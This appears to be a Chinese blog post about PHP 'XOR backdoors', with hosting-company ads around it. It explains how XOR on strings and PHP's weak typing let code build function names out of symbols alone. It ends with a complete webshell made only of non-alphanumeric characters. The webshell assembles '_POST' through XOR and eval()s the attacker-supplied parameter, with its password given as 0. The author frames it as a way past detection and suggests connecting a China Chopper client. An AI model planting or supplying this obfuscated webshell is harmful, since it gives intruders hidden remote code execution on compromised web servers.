php后門--異或-創(chuàng)新互聯(lián)

  看這個(gè):

專注于為中小企業(yè)提供網(wǎng)站設(shè)計(jì)、成都做網(wǎng)站服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)鄂溫克免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動(dòng)了上千家企業(yè)的穩(wěn)健成長,幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。

<?php

echo"A"^"}";

?>

  運(yùn)行這段代碼,那么輸出的結(jié)果是字符"<",之所以會(huì)得到這樣的結(jié)果,是因?yàn)榇a中對字符"A"和字符"}"進(jìn)行了異或操作。在PHP中,兩個(gè)變量進(jìn)行異或時(shí),會(huì)將字符串轉(zhuǎn)換成二進(jìn)制再進(jìn)行異或,異或完,又將結(jié)果從二進(jìn)制轉(zhuǎn)換成了字符串。異或操作有時(shí)也被用來交換兩個(gè)變量的值。

  我們都知道,PHP是弱類型的語言,也就是說在PHP中我們可以不預(yù)先聲明變量的類型,而直接聲明一個(gè)變量并進(jìn)行初始化或賦值操作。正是由于PHP弱類型的這個(gè)特點(diǎn),我們對PHP的變類型進(jìn)行隱式的轉(zhuǎn)換,并利用這個(gè)特點(diǎn)進(jìn)行一些非常規(guī)的操作。如將整型轉(zhuǎn)換成字符串型,將布爾型當(dāng)作整型,或者將字符串當(dāng)作函數(shù)來處理,下面我們來看一段代碼:

<?php

$_++;

$__="<"^"}";

$__("stuff");

?>

看到這段代碼,大家或許會(huì)覺得很疑惑,下面我簡單的來解釋一下:

 (1)$_++;這行代碼的意思是對變量名為"_"的變量進(jìn)行自增操作,在PHP中未定義的變量默認(rèn)值為null,null==false==0,我們可以在不使用任何數(shù)字的情況下,通過對未定義變量的自增操作來得到一個(gè)數(shù)字。

 (2)$__="<"^"}";對字符"<"和"}"進(jìn)行異或運(yùn)算,得到結(jié)果A賦給變量名為"__"(兩個(gè)下劃線)的變量

 (3)$__("stuff");通過上面的賦值操作,變量$__的值為A,所以這行可以看作是A("stuff"),在PHP中,這行代碼表示調(diào)用函數(shù)A,但是由于程序中并未定義函數(shù)A,所以這行代碼會(huì)拋出一個(gè)致命錯(cuò)誤使程序停止運(yùn)行。這行代碼沒什么實(shí)際的意義,但是它能簡單體現(xiàn)出在PHP中,我們可以將字符串當(dāng)作函數(shù)來處理。

 文章進(jìn)行到這里,大家如果再看到類似的PHP后門應(yīng)該不會(huì)那么迷惑了,你可以通過一句句的分析后門代碼來理解后門想實(shí)現(xiàn)的功能。如果你依然迷惑,那說明本菜鳥的文章寫的不好,先說聲抱歉了,但是還是希望你別罵我。

 上面的那段示例代碼最后會(huì)出錯(cuò),導(dǎo)致程序停止運(yùn)行,當(dāng)然寫出一個(gè)出錯(cuò)的程序并不是我們的目的,使用這種后門的主要目的是創(chuàng)建一些可以繞過檢測的并且對我們有用的字符串,如_POST", "system", "call_user_func_array",或者是任何我們需要的東西。

 下面是個(gè)非常簡單的非數(shù)字字母的PHP后門:

@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
@eval(${$__}[!$_]);//mima:0

  上菜刀把。

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時(shí)售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場景需求。

新聞名稱:php后門--異或-創(chuàng)新互聯(lián)
文章地址:http://bm7419.com/article36/dihpsg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供搜索引擎優(yōu)化、關(guān)鍵詞優(yōu)化品牌網(wǎng)站設(shè)計(jì)、定制網(wǎng)站面包屑導(dǎo)航、用戶體驗(yàn)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)